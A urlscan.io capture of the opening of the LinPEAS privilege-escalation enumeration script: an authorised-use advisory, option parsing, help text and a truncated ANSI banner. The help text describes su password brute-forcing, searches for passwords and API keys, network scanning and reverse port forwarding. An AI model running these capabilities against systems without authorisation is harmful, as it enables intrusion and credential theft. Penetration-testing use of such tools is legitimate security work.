linpeas.sh Open in urlscan Pro
2606:4700:3030::ac43:949b  Public Scan

Submitted URL: http://linpeas.sh/
Effective URL: https://linpeas.sh/
Submission: On April 14 via manual from US — Scanned from DE

Form analysis 0 forms found in the DOM

Text Content

#!/bin/sh VERSION="ng" ADVISORY="This script should be used for authorized
penetration testing and/or educational purposes only. Any misuse of this
software will not be the responsibility of the author or of any other
collaborator. Use it at your own computers and/or with the computer owner's
permission." ########################################### #-------) Checks
pre-everything (---------# ########################################### if ([ -f
/usr/bin/id ] && [ "$(/usr/bin/id -u)" -eq "0" ]) || [ "`whoami 2>/dev/null`" =
"root" ]; then IAMROOT="1" MAXPATH_FIND_W="3" else IAMROOT="" MAXPATH_FIND_W="7"
fi ########################################### #---------------) Colors
(----------------# ########################################### C=$(printf
'\033') RED="${C}[1;31m" SED_RED="${C}[1;31m&${C}[0m" GREEN="${C}[1;32m"
SED_GREEN="${C}[1;32m&${C}[0m" YELLOW="${C}[1;33m"
SED_YELLOW="${C}[1;33m&${C}[0m" RED_YELLOW="${C}[1;31;103m"
SED_RED_YELLOW="${C}[1;31;103m&${C}[0m" BLUE="${C}[1;34m"
SED_BLUE="${C}[1;34m&${C}[0m" ITALIC_BLUE="${C}[1;34m${C}[3m"
LIGHT_MAGENTA="${C}[1;95m" SED_LIGHT_MAGENTA="${C}[1;95m&${C}[0m"
LIGHT_CYAN="${C}[1;96m" SED_LIGHT_CYAN="${C}[1;96m&${C}[0m" LG="${C}[1;37m"
#LightGray SED_LG="${C}[1;37m&${C}[0m" DG="${C}[1;90m" #DarkGray
SED_DG="${C}[1;90m&${C}[0m" NC="${C}[0m" UNDERLINED="${C}[5m" ITALIC="${C}[3m"
########################################### #---------) Parsing parameters
(----------# ########################################### # --) FAST - Do not
check 1min of procceses and su brute # --) SUPERFAST - FAST & do not search for
special filaes in all the folders if uname 2>/dev/null | grep -q 'Darwin' ||
/usr/bin/uname 2>/dev/null | grep -q 'Darwin'; then MACPEAS="1"; else
MACPEAS=""; fi FAST="1" # By default stealth/fast mode SUPERFAST="" DISCOVERY=""
PORTS="" QUIET=""
CHECKS="system_information,container,cloud,procs_crons_timers_srvcs_sockets,network_information,users_information,software_information,interesting_perms_files,interesting_files,api_keys_regex"
SEARCH_IN_FOLDER="" ROOT_FOLDER="/" WAIT="" PASSWORD="" NOCOLOR="" DEBUG=""
AUTO_NETWORK_SCAN="" EXTRA_CHECKS="" REGEXES="" PORT_FORWARD="" THREADS="$( (
(grep -c processor /proc/cpuinfo 2>/dev/null) || ( (command -v lscpu >/dev/null
2>&1) && (lscpu | grep '^CPU(s):' | awk '{print $2}')) || echo -n 2) | tr -d
"\n")" [ -z "$THREADS" ] && THREADS="2" # If THREADS is empty, put number 2 [ -n
"$THREADS" ] && THREADS="2" # If THREADS is null, put number 2 [ "$THREADS" -eq
"$THREADS" ] 2>/dev/null && : || THREADS="2" # It THREADS is not a number, put
number 2 HELP=$GREEN"Enumerate and search Privilege Escalation vectors.
${NC}This tool enum and search possible misconfigurations$DG (known vulns, user,
processes and file permissions, special file permissions, readable/writable
files, bruteforce other users(top1000pwds), passwords...)$NC inside the host and
highlight possible misconfigurations with colors. ${GREEN} Checks: ${YELLOW}
-a${BLUE} Perform all checks: 1 min of processes, su brute, and extra checks.
${YELLOW} -o${BLUE} Only execute selected checks
(system_information,container,cloud,procs_crons_timers_srvcs_sockets,network_information,users_information,software_information,interesting_perms_files,interesting_files,api_keys_regex).
Select a comma separated list. ${YELLOW} -s${BLUE} Stealth & faster (don't check
some time consuming checks) ${YELLOW} -e${BLUE} Perform extra enumeration
${YELLOW} -t${BLUE} Automatic network scan & Internet conectivity checks - This
option writes to files ${YELLOW} -r${BLUE} Enable Regexes (this can take from
some mins to hours) ${YELLOW} -P${BLUE} Indicate a password that will be used to
run 'sudo -l' and to bruteforce other users accounts via 'su' ${YELLOW}
-D${BLUE} Debug mode ${GREEN} Network recon: ${YELLOW} -t${BLUE} Automatic
network scan & Internet conectivity checks - This option writes to files
${YELLOW} -d <IP/NETMASK>${BLUE} Discover hosts using fping or ping.$DG Ex: -d
192.168.0.1/24 ${YELLOW} -p <PORT(s)> -d <IP/NETMASK>${BLUE} Discover hosts
looking for TCP open ports (via nc). By default ports 22,80,443,445,3389 and
another one indicated by you will be scanned (select 22 if you don't want to add
more). You can also add a list of ports.$DG Ex: -d 192.168.0.1/24 -p 53,139
${YELLOW} -i <IP> [-p <PORT(s)>]${BLUE} Scan an IP using nc. By default (no -p),
top1000 of nmap will be scanned, but you can select a list of ports instead.$DG
Ex: -i 127.0.0.1 -p 53,80,443,8000,8080 $GREEN Notice${BLUE} that if you specify
some network scan (options -d/-p/-i but NOT -t), no PE check will be performed
${GREEN} Port forwarding (reverse connection): ${YELLOW} -F
LOCAL_IP:LOCAL_PORT:REMOTE_IP:REMOTE_PORT${BLUE} Execute linpeas to forward a
port from a your host (LOCAL_IP:LOCAL_PORT) to a remote IP
(REMOTE_IP:REMOTE_PORT) ${GREEN} Firmware recon: ${YELLOW} -f
</FOLDER/PATH>${BLUE} Execute linpeas to search passwords/file permissions
misconfigs inside a folder ${GREEN} Misc: ${YELLOW} -h${BLUE} To show this
message ${YELLOW} -w${BLUE} Wait execution between big blocks of checks
${YELLOW} -L${BLUE} Force linpeas execution ${YELLOW} -M${BLUE} Force macpeas
execution ${YELLOW} -q${BLUE} Do not show banner ${YELLOW} -N${BLUE} Do not use
colours$NC" while getopts "h?asd:p:i:P:qo:LMwNDterf:F:" opt; do case "$opt" in
h|\?) printf "%s\n\n" "$HELP$NC"; exit 0;; a) FAST="";EXTRA_CHECKS="1";; s)
SUPERFAST=1;; d) DISCOVERY=$OPTARG;; p) PORTS=$OPTARG;; i) IP=$OPTARG;; P)
PASSWORD=$OPTARG;; q) QUIET=1;; o) CHECKS=$OPTARG;; L) MACPEAS="";; M)
MACPEAS="1";; w) WAIT=1;; N) NOCOLOR="1";; D) DEBUG="1";; t)
AUTO_NETWORK_SCAN="1"; CHECKS="network_information";; e) EXTRA_CHECKS="1";; r)
REGEXES="1";; f) SEARCH_IN_FOLDER=$OPTARG; if ! [ "$(echo -n $SEARCH_IN_FOLDER |
tail -c 1)" = "/" ]; then # Make sure firmware folder ends with "/"
SEARCH_IN_FOLDER="${SEARCH_IN_FOLDER}/"; fi; ROOT_FOLDER=$SEARCH_IN_FOLDER;
REGEXES="1";
CHECKS="procs_crons_timers_srvcs_sockets,software_information,interesting_perms_files,interesting_files,api_keys_regex";;
F) PORT_FORWARD=$OPTARG;; esac done if [ "$MACPEAS" ]; then
SCRIPTNAME="macpeas"; else SCRIPTNAME="linpeas"; fi if [ "$NOCOLOR" ]; then C=""
RED="" SED_RED="&" GREEN="" SED_GREEN="&" YELLOW="" SED_YELLOW="&"
SED_RED_YELLOW="&" BLUE="" SED_BLUE="&" ITALIC_BLUE="" LIGHT_MAGENTA=""
SED_LIGHT_MAGENTA="&" LIGHT_CYAN="" SED_LIGHT_CYAN="&" LG="" SED_LG="&" DG=""
SED_DG="&" NC="" UNDERLINED="" ITALIC="" fi
########################################### #---------------) BANNER
(----------------# ########################################### print_banner(){
if [ "$MACPEAS" ]; then bash -c "printf '
\e[38;5;238m▄\e[38;5;233m▄\e[38;5;235m▄\e[38;5;65m▄\e[48;5;239m\e[38;5;107m▄\e[48;5;234m\e[38;5;71m▄\e[48;5;233m\e[38;5;71m▄\e[48;5;232m\e[38;5;71m▄\e[48;5;0m\e[38;5;71m▄\e[48;5;232m\e[38;5;71m▄\e[48;5;232m\e[38;5;71m▄\e[48;5;233m\e[38;5;71m▄\e[48;5;233m\e[38;5;71m▄\e[48;5;235m\e[38;5;71m▄\e[48;5;240m\e[38;5;65m▄\e[0m\e[38;5;237m▄\e[38;5;234m▄\e[38;5;233m▄\e[38;5;232m▄\e[38;5;239m▄\e[0m
\e[38;5;233m▄\e[38;5;246m▄\e[48;5;234m\e[38;5;71m▄\e[48;5;237m\e[38;5;71m▄\e[48;5;71m
\e[38;5;65m▄\e[48;5;71m\e[38;5;237m▄\e[48;5;71m\e[38;5;233m▄\e[48;5;71m\e[38;5;233m▄\e[48;5;71m\e[38;5;233m▄\e[48;5;71m\e[38;5;237m▄\e[48;5;71m\e[38;5;65m▄\e[48;5;71m
\e[48;5;65m\e[38;5;71m▄\e[48;5;235m\e[38;5;71m▄\e[48;5;235m\e[38;5;71m▄\e[0m\e[38;5;237m▄\e[38;5;234m▄\e[0m
\e[38;5;245m▄\e[38;5;233m▄\e[48;5;233m\e[38;5;71m▄\e[48;5;239m\e[38;5;71m▄\e[48;5;71m
\e[38;5;235m▄\e[48;5;71m\e[38;5;232m▄\e[48;5;236m\e[38;5;64m▄\e[48;5;234m\e[38;5;76m▄\e[48;5;232m\e[38;5;76m▄\e[48;5;234m\e[38;5;76m▄\e[48;5;2m\e[38;5;76m▄\e[48;5;64m\e[38;5;76m▄\e[48;5;70m\e[38;5;76m▄\e[48;5;70m\e[38;5;76m▄\e[48;5;64m\e[38;5;76m▄\e[48;5;2m\e[38;5;76m▄\e[48;5;22m\e[38;5;76m▄\e[48;5;232m\e[38;5;76m▄\e[48;5;232m\e[38;5;70m▄\e[48;5;234m\e[38;5;22m▄\e[48;5;65m\e[38;5;232m▄\e[48;5;71m\e[38;5;232m▄\e[48;5;71m\e[38;5;238m▄\e[48;5;71m
\e[48;5;237m\e[38;5;71m▄\e[48;5;236m\e[38;5;71m▄\e[0m\e[38;5;234m▄\e[38;5;238m▄\e[0m
\e[38;5;239m▄\e[38;5;233m▄\e[48;5;235m\e[38;5;71m▄\e[48;5;238m\e[38;5;71m▄\e[48;5;71m
\e[38;5;0m▄\e[48;5;236m\e[38;5;2m▄\e[48;5;232m\e[38;5;76m▄\e[48;5;70m\e[38;5;76m▄\e[48;5;76m
\e[38;5;70m▄\e[48;5;76m\e[38;5;64m▄\e[48;5;76m\e[38;5;2m▄\e[48;5;76m\e[38;5;22m▄\e[48;5;76m\e[38;5;22m▄\e[48;5;76m\e[38;5;22m▄\e[48;5;76m\e[38;5;2m▄\e[48;5;76m\e[38;5;2m▄\e[48;5;76m\e[38;5;64m▄\e[48;5;76m\e[38;5;70m▄\e[48;5;76m
\e[48;5;22m\e[38;5;76m▄\e[48;5;0m\e[38;5;76m▄\e[48;5;234m\e[38;5;64m▄\e[48;5;71m\e[38;5;232m▄\e[48;5;71m\e[38;5;235m▄\e[48;5;71m
\e[48;5;234m\e[38;5;71m▄\e[48;5;234m\e[38;5;71m▄\e[0m\e[38;5;234m▄\e[38;5;233m▄\e[0m
\e[38;5;233m▄\e[38;5;71m▄\e[48;5;233m\e[38;5;71m▄\e[48;5;71m
\e[38;5;235m▄\e[48;5;65m\e[38;5;235m▄\e[48;5;0m\e[38;5;255m▄\e[48;5;22m\e[38;5;15m▄\e[48;5;235m\e[38;5;15m▄\e[48;5;242m\e[38;5;15m▄\e[48;5;249m\e[38;5;15m▄\e[48;5;254m\e[38;5;15m▄\e[48;5;15m
\e[38;5;255m▄\e[48;5;255m\e[38;5;234m▄\e[48;5;248m\e[38;5;251m▄\e[48;5;240m\e[38;5;15m▄\e[48;5;237m\e[38;5;15m▄\e[48;5;235m\e[38;5;15m▄\e[48;5;64m\e[38;5;15m▄\e[48;5;70m\e[38;5;251m▄\e[48;5;76m\e[38;5;8m▄\e[48;5;76m\e[38;5;237m▄\e[48;5;76m\e[38;5;2m▄\e[48;5;64m\e[38;5;70m▄\e[48;5;232m\e[38;5;76m▄\e[48;5;238m\e[38;5;2m▄\e[48;5;71m\e[38;5;233m▄\e[48;5;71m\e[38;5;65m▄\e[48;5;71m
\e[48;5;237m\e[38;5;71m▄\e[0m
\e[38;5;233m▄\e[48;5;238m\e[38;5;71m▄\e[48;5;236m\e[38;5;71m▄\e[48;5;71m
\e[38;5;65m▄\e[48;5;238m\e[38;5;234m▄\e[48;5;235m\e[38;5;255m▄\e[48;5;15m
\e[38;5;233m▄\e[48;5;253m\e[38;5;0m▄\e[48;5;255m\e[38;5;232m▄\e[48;5;242m\e[38;5;238m▄\e[48;5;242m\e[38;5;233m▄\e[48;5;15m\e[38;5;237m▄\e[48;5;15m\e[38;5;255m▄\e[48;5;15m
\e[48;5;255m\e[38;5;15m▄\e[48;5;145m\e[38;5;15m▄\e[48;5;237m\e[38;5;15m▄\e[48;5;22m\e[38;5;255m▄\e[48;5;70m\e[38;5;248m▄\e[48;5;234m\e[38;5;235m▄\e[48;5;234m\e[38;5;233m▄\e[48;5;71m\e[38;5;0m▄\e[48;5;71m\e[38;5;238m▄\e[48;5;71m
\e[0m \e[48;5;71m
\e[38;5;234m▄\e[48;5;233m\e[38;5;251m▄\e[48;5;255m\e[38;5;15m▄\e[48;5;15m
\e[48;5;243m\e[38;5;235m▄\e[48;5;0m
\e[38;5;243m▄\e[48;5;249m\e[38;5;15m▄\e[48;5;15m
\e[48;5;255m\e[38;5;15m▄\e[48;5;249m\e[38;5;15m▄\e[48;5;235m\e[38;5;15m▄\e[48;5;232m\e[38;5;15m▄\e[48;5;235m\e[38;5;145m▄\e[48;5;71m\e[38;5;0m▄\e[48;5;71m\e[38;5;232m▄\e[48;5;71m\e[38;5;233m▄\e[48;5;71m\e[38;5;237m▄\e[0m
\e[48;5;71m \e[48;5;65m\e[38;5;232m▄\e[48;5;241m\e[38;5;15m▄\e[48;5;15m
\e[48;5;236m\e[38;5;245m▄\e[48;5;0m \e[48;5;247m\e[38;5;232m▄\e[48;5;15m
\e[48;5;247m\e[38;5;15m▄\e[48;5;236m\e[38;5;235m▄\e[48;5;236m
\e[48;5;237m\e[38;5;236m▄\e[0m \e[48;5;71m
\e[38;5;238m▄\e[48;5;234m\e[38;5;243m▄\e[48;5;253m\e[38;5;15m▄\e[48;5;15m
\e[48;5;0m\e[38;5;7m▄\e[48;5;0m\e[38;5;239m▄\e[48;5;0m\e[38;5;102m▄\e[48;5;0m\e[38;5;234m▄\e[48;5;0m\e[38;5;232m▄\e[48;5;0m\e[38;5;252m▄\e[48;5;255m\e[38;5;15m▄\e[48;5;15m
\e[48;5;239m\e[38;5;7m▄\e[48;5;236m\e[38;5;235m▄\e[48;5;236m \e[0m \e[48;5;71m
\e[38;5;236m▄\e[48;5;234m\e[38;5;250m▄\e[48;5;15m
\e[38;5;255m▄\e[48;5;15m\e[38;5;250m▄\e[48;5;15m\e[38;5;102m▄\e[48;5;15m\e[38;5;238m▄\e[48;5;15m\e[38;5;235m▄\e[48;5;15m\e[38;5;236m▄\e[48;5;15m\e[38;5;236m▄\e[48;5;15m\e[38;5;2m▄\e[48;5;255m\e[38;5;2m▄\e[48;5;255m\e[38;5;64m▄\e[48;5;254m\e[38;5;70m▄\e[48;5;188m\e[38;5;70m▄\e[48;5;253m\e[38;5;70m▄\e[48;5;255m\e[38;5;70m▄\e[48;5;255m\e[38;5;70m▄\e[48;5;255m\e[38;5;70m▄\e[48;5;15m\e[38;5;28m▄\e[48;5;15m\e[38;5;64m▄\e[48;5;15m\e[38;5;236m▄\e[48;5;15m\e[38;5;237m▄\e[48;5;15m\e[38;5;236m▄\e[48;5;15m\e[38;5;237m▄\e[48;5;15m\e[38;5;240m▄\e[48;5;15m\e[38;5;102m▄\e[48;5;15m\e[38;5;251m▄\e[48;5;15m\e[38;5;255m▄\e[48;5;15m
\e[48;5;255m\e[38;5;15m▄\e[48;5;234m\e[38;5;235m▄\e[48;5;236m \e[0m \e[48;5;71m
\e[38;5;233m▄\e[48;5;232m\e[38;5;70m▄\e[48;5;238m\e[38;5;76m▄\e[48;5;65m\e[38;5;76m▄\e[48;5;236m\e[38;5;76m▄\e[48;5;70m\e[38;5;76m▄\e[48;5;76m
\e[48;5;70m\e[38;5;76m▄\e[48;5;28m\e[38;5;76m▄\e[48;5;234m\e[38;5;76m▄\e[48;5;235m\e[38;5;76m▄\e[48;5;240m\e[38;5;76m▄\e[48;5;145m\e[38;5;76m▄\e[48;5;15m\e[38;5;28m▄\e[48;5;15m\e[38;5;235m▄\e[48;5;15m\e[38;5;240m▄\e[48;5;15m\e[38;5;145m▄\e[48;5;15m\e[38;5;254m▄\e[48;5;15m
\e[48;5;242m\e[38;5;251m▄\e[48;5;236m\e[38;5;235m▄\e[0m
\e[48;5;65m\e[38;5;232m▄\e[48;5;235m\e[38;5;64m▄\e[48;5;70m \e[48;5;76m
\e[48;5;2m\e[38;5;76m▄\e[48;5;234m\e[38;5;76m▄\e[48;5;242m\e[38;5;76m▄\e[48;5;254m\e[38;5;64m▄\e[48;5;15m\e[38;5;234m▄\e[48;5;15m\e[38;5;243m▄\e[48;5;15m\e[38;5;253m▄\e[48;5;15m
\e[48;5;255m\e[38;5;15m▄\e[48;5;233m \e[0m \e[48;5;232m \e[48;5;237m \e[48;5;70m
\e[48;5;76m
\e[38;5;70m▄\e[48;5;76m\e[38;5;233m▄\e[48;5;76m\e[38;5;233m▄\e[48;5;76m\e[38;5;233m▄\e[48;5;76m\e[38;5;233m▄\e[48;5;76m
\e[38;5;70m▄\e[48;5;76m\e[38;5;233m▄\e[48;5;76m\e[38;5;233m▄\e[48;5;76m\e[38;5;233m▄\e[48;5;76m\e[38;5;234m▄\e[48;5;76m\e[38;5;70m▄\e[48;5;76m
\e[48;5;28m\e[38;5;76m▄\e[48;5;235m\e[38;5;76m▄\e[48;5;102m\e[38;5;236m▄\e[48;5;250m\e[38;5;235m▄\e[48;5;233m\e[38;5;232m▄\e[0m
\e[48;5;232m \e[48;5;237m \e[48;5;70m \e[48;5;76m
\e[48;5;70m\e[38;5;76m▄\e[48;5;64m\e[38;5;76m▄\e[48;5;76m\e[38;5;64m▄\e[48;5;76m\e[38;5;233m▄\e[48;5;233m\e[38;5;76m▄\e[48;5;22m\e[38;5;76m▄\e[48;5;76m
\e[48;5;22m\e[38;5;76m▄\e[48;5;233m\e[38;5;76m▄\e[48;5;76m\e[38;5;233m▄\e[48;5;76m\e[38;5;70m▄\e[48;5;28m\e[38;5;76m▄\e[48;5;76m
\e[48;5;70m \e[48;5;236m \e[48;5;238m \e[48;5;236m\e[0m
\e[48;5;232m\e[38;5;236m▄\e[48;5;236m\e[38;5;233m▄\e[48;5;64m \e[48;5;76m
\e[48;5;70m\e[38;5;76m▄\e[48;5;22m\e[38;5;76m▄\e[48;5;76m
\e[38;5;64m▄\e[48;5;76m\e[38;5;0m▄\e[48;5;76m\e[38;5;232m▄\e[48;5;76m\e[38;5;232m▄\e[48;5;76m\e[38;5;0m▄\e[48;5;76m\e[38;5;70m▄\e[48;5;76m
\e[48;5;233m\e[38;5;76m▄\e[48;5;70m\e[38;5;76m▄\e[48;5;76m \e[48;5;64m
\e[48;5;236m \e[38;5;235m▄\e[0m \e[48;5;71m
\e[48;5;232m\e[38;5;65m▄\e[48;5;64m\e[38;5;233m▄\e[48;5;76m
\e[38;5;107m▄\e[48;5;77m\e[38;5;107m▄\e[48;5;77m\e[38;5;107m▄\e[48;5;77m\e[38;5;107m▄\e[48;5;76m\e[38;5;77m▄\e[48;5;76m
\e[48;5;0m\e[38;5;70m▄\e[48;5;0m\e[38;5;232m▄\e[48;5;0m\e[38;5;232m▄\e[48;5;0m\e[38;5;70m▄\e[48;5;76m
\e[38;5;77m▄\e[48;5;76m\e[38;5;107m▄\e[48;5;76m\e[38;5;107m▄\e[48;5;76m\e[38;5;107m▄\e[48;5;76m\e[38;5;77m▄\e[48;5;76m
\e[38;5;70m▄\e[48;5;236m \e[48;5;237m\e[38;5;238m▄\e[48;5;234m\e[38;5;235m▄\e[0m
\e[48;5;71m \e[48;5;235m\e[38;5;71m▄\e[48;5;64m\e[38;5;232m▄\e[48;5;76m
\e[48;5;77m\e[38;5;76m▄\e[48;5;107m\e[38;5;77m▄\e[48;5;107m
\e[38;5;77m▄\e[48;5;77m \e[48;5;76m \e[48;5;107m\e[38;5;77m▄\e[48;5;107m
\e[48;5;71m\e[38;5;77m▄\e[48;5;76m \e[48;5;64m
\e[48;5;236m\e[38;5;237m▄\e[48;5;237m\e[38;5;234m▄\e[0m \e[48;5;71m
\e[48;5;232m\e[38;5;239m▄\e[48;5;76m\e[38;5;232m▄\e[48;5;76m
\e[48;5;70m\e[38;5;64m▄\e[48;5;237m\e[38;5;236m▄\e[48;5;238m\e[38;5;234m▄\e[48;5;235m\e[38;5;236m▄\e[0m
\e[48;5;71m
\e[48;5;237m\e[38;5;71m▄\e[48;5;232m\e[38;5;235m▄\e[48;5;76m\e[38;5;232m▄\e[48;5;76m
\e[48;5;70m\e[38;5;236m▄\e[48;5;236m
\e[48;5;237m\e[38;5;234m▄\e[48;5;235m\e[38;5;236m▄\e[0m
\e[48;5;71m\e[38;5;237m▄\e[48;5;71m\e[38;5;65m▄\e[48;5;71m
\e[48;5;236m\e[38;5;71m▄\e[48;5;232m\e[38;5;65m▄\e[48;5;70m\e[38;5;0m▄\e[48;5;76m\e[38;5;22m▄\e[48;5;76m
\e[38;5;22m▄\e[48;5;76m\e[38;5;232m▄\e[48;5;70m\e[38;5;236m▄\e[48;5;236m\e[38;5;235m▄\e[48;5;235m\e[38;5;238m▄\e[48;5;235m\e[38;5;238m▄\e[48;5;235m\e[38;5;238m▄\e[48;5;235m\e[38;5;238m▄\e[48;5;236m\e[38;5;235m▄\e[48;5;236m\e[38;5;233m▄\e[0m
\e[38;5;233m▀\e[48;5;71m\e[38;5;232m▄\e[48;5;71m
\e[48;5;236m\e[38;5;71m▄\e[48;5;0m\e[38;5;71m▄\e[48;5;2m\e[38;5;235m▄\e[48;5;76m\e[38;5;0m▄\e[48;5;76m\e[38;5;22m▄\e[48;5;76m
\e[38;5;77m▄\e[48;5;76m\e[38;5;236m▄\e[48;5;76m\e[38;5;232m▄\e[48;5;76m\e[38;5;232m▄\e[48;5;22m\e[38;5;238m▄\e[48;5;232m\e[38;5;71m▄\e[48;5;65m\e[38;5;71m▄\e[48;5;71m
\e[0m \e[48;5;65m\e[38;5;238m▄\e[48;5;71m\e[38;5;234m▄\e[48;5;71m
\e[48;5;235m\e[38;5;71m▄\e[48;5;0m\e[38;5;71m▄\e[48;5;232m\e[38;5;71m▄\e[48;5;233m\e[38;5;238m▄\e[48;5;65m\e[38;5;234m▄\e[48;5;70m\e[38;5;232m▄\e[48;5;77m\e[38;5;0m▄\e[48;5;76m\e[38;5;232m▄\e[48;5;76m\e[38;5;235m▄\e[48;5;76m\e[38;5;237m▄\e[48;5;76m\e[38;5;237m▄\e[48;5;76m\e[38;5;65m▄\e[48;5;76m\e[38;5;65m▄\e[48;5;76m\e[38;5;22m▄\e[48;5;76m\e[38;5;234m▄\e[48;5;76m\e[38;5;232m▄\e[48;5;76m\e[38;5;0m▄\e[48;5;76m\e[38;5;0m▄\e[48;5;71m\e[38;5;232m▄\e[48;5;237m\e[38;5;236m▄\e[48;5;233m\e[38;5;71m▄\e[48;5;0m\e[38;5;71m▄\e[48;5;234m\e[38;5;71m▄\e[48;5;65m\e[38;5;71m▄\e[48;5;71m
\e[38;5;65m▄\e[48;5;71m\e[38;5;235m▄\e[48;5;71m\e[38;5;235m▄\e[48;5;71m\e[38;5;236m▄\e[48;5;71m\e[38;5;236m▄\e[48;5;71m\e[38;5;237m▄\e[0m
\e[38;5;232m▀\e[48;5;65m\e[38;5;236m▄\e[48;5;71m\e[38;5;234m▄\e[48;5;71m
\e[48;5;65m\e[38;5;71m▄\e[48;5;237m\e[38;5;71m▄\e[48;5;234m\e[38;5;71m▄\e[48;5;233m\e[38;5;71m▄\e[48;5;234m\e[38;5;71m▄\e[48;5;237m\e[38;5;71m▄\e[48;5;65m\e[38;5;71m▄\e[48;5;65m\e[38;5;71m▄\e[48;5;71m
\e[38;5;237m▄\e[48;5;71m\e[38;5;233m▄\e[48;5;65m\e[38;5;8m▄\e[0m\e[38;5;234m▀\e[38;5;234m▀\e[38;5;239m▀\e[0m
\e[38;5;234m▀\e[38;5;236m▀\e[48;5;71m\e[38;5;235m▄\e[48;5;71m\e[38;5;234m▄\e[48;5;71m\e[38;5;238m▄\e[48;5;71m\e[38;5;65m▄\e[48;5;71m
\e[38;5;65m▄\e[48;5;71m\e[38;5;236m▄\e[48;5;71m\e[38;5;233m▄\e[48;5;71m\e[38;5;235m▄\e[48;5;65m\e[38;5;243m▄\e[0m\e[38;5;233m▀\e[38;5;235m▀\e[0m
\e[38;5;242m▀\e[38;5;233m▀\e[38;5;232m▀\e[38;5;234m▀\e[38;5;236m▀\e[48;5;65m\e[38;5;236m▄\e[48;5;65m\e[38;5;233m▄\e[48;5;71m\e[38;5;233m▄\e[48;5;71m\e[38;5;233m▄\e[48;5;71m\e[38;5;232m▄\e[48;5;71m\e[38;5;232m▄\e[48;5;71m\e[38;5;233m▄\e[48;5;65m\e[38;5;237m▄\e[48;5;237m\e[38;5;8m▄\e[0m\e[38;5;234m▀\e[38;5;232m▀\e[38;5;232m▀\e[38;5;59m▀\e[0m
'"; else if [ -f "/bin/bash" ]; then /bin/bash -c "printf '
\e[38;2;26;43;21m▄\e[38;2;58;91;50m▄\e[48;2;116;117;116m\e[38;2;68;119;56m▄\e[48;2;98;98;98m\e[38;2;86;143;70m▄\e[48;2;98;98;98m\e[38;2;100;153;87m▄\e[48;2;63;65;63m\e[38;2;102;164;86m▄\e[48;2;46;49;44m\e[38;2;98;168;79m▄\e[48;2;43;45;43m\e[38;2;91;155;75m▄\e[48;2;61;62;61m\e[38;2;78;137;63m▄\e[48;2;102;101;102m\e[38;2;64;112;52m▄\e[0m\e[38;2;38;67;32m▄\e[38;2;20;35;16m▄\e[38;2;10;20;8m▄\e[38;2;15;21;13m▄\e[0m
\e[38;2;49;80;41m▄\e[38;2;73;133;59m▄\e[48;2;20;21;20m\e[38;2;91;163;72m▄\e[48;2;14;27;12m\e[38;2;96;174;76m▄\e[48;2;51;92;41m\e[38;2;98;177;78m▄\e[48;2;86;155;68m\e[38;2;98;177;78m▄\e[48;2;96;173;77m\e[38;2;98;177;78m▄\e[48;2;98;177;78m
\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m
\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m
\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m
\e[48;2;98;178;78m\e[38;2;98;177;78m▄\e[48;2;97;175;76m\e[38;2;98;177;78m▄\e[48;2;93;168;74m\e[38;2;98;177;78m▄\e[48;2;99;163;83m\e[38;2;97;177;77m▄\e[48;2;99;151;86m\e[38;2;98;177;78m▄\e[48;2;35;57;29m\e[38;2;98;176;78m▄\e[48;2;19;21;19m\e[38;2;94;169;75m▄\e[0m\e[38;2;70;125;56m▄\e[0m
\e[38;2;42;65;36m▄\e[38;2;62;106;52m▄\e[48;2;94;95;94m\e[38;2;86;152;70m▄\e[48;2;57;72;53m\e[38;2;96;174;77m▄\e[48;2;57;96;47m\e[38;2;98;177;78m▄\e[48;2;78;136;62m\e[38;2;98;177;78m▄\e[48;2;95;167;76m\e[38;2;98;177;78m▄\e[48;2;98;177;78m
\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m
\e[48;2;98;177;78m
\e[48;2;98;177;78m\e[38;2;98;176;77m▄\e[48;2;98;177;78m\e[38;2;91;165;72m▄\e[48;2;98;177;78m\e[38;2;76;137;60m▄\e[48;2;98;177;78m\e[38;2;54;97;42m▄\e[48;2;99;179;79m\e[38;2;39;71;30m▄\e[48;2;100;181;79m\e[38;2;35;60;30m▄\e[48;2;101;181;81m\e[38;2;42;66;37m▄\e[48;2;100;177;80m\e[38;2;52;73;45m▄\e[48;2;95;175;76m\e[38;2;47;75;40m▄\e[48;2;94;178;73m\e[38;2;41;75;33m▄\e[48;2;98;179;78m\e[38;2;42;73;34m▄\e[48;2;99;180;79m\e[38;2;40;70;33m▄\e[48;2;99;179;78m\e[38;2;44;75;36m▄\e[48;2;97;177;77m\e[38;2;55;93;46m▄\e[48;2;97;176;77m\e[38;2;65;113;52m▄\e[48;2;98;177;78m\e[38;2;79;141;63m▄\e[48;2;98;177;78m\e[38;2;93;166;75m▄\e[48;2;98;177;78m\e[38;2;99;177;79m▄\e[48;2;98;177;78m\e[38;2;97;177;78m▄\e[48;2;98;177;78m\e[38;2;97;177;78m▄\e[48;2;98;177;78m
\e[48;2;98;177;78m
\e[48;2;94;170;75m\e[38;2;98;177;78m▄\e[48;2;71;128;56m\e[38;2;98;177;78m▄\e[48;2;34;56;28m\e[38;2;97;175;77m▄\e[48;2;64;66;64m\e[38;2;78;140;62m▄\e[0m
\e[48;2;66;112;54m\e[38;2;98;177;78m▄\e[48;2;80;133;66m\e[38;2;98;177;78m▄\e[48;2;95;162;76m\e[38;2;98;177;78m▄\e[48;2;96;171;76m\e[38;2;98;177;78m▄\e[48;2;98;177;78m
\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m
\e[48;2;98;177;78m\e[38;2;98;176;78m▄\e[48;2;98;177;78m
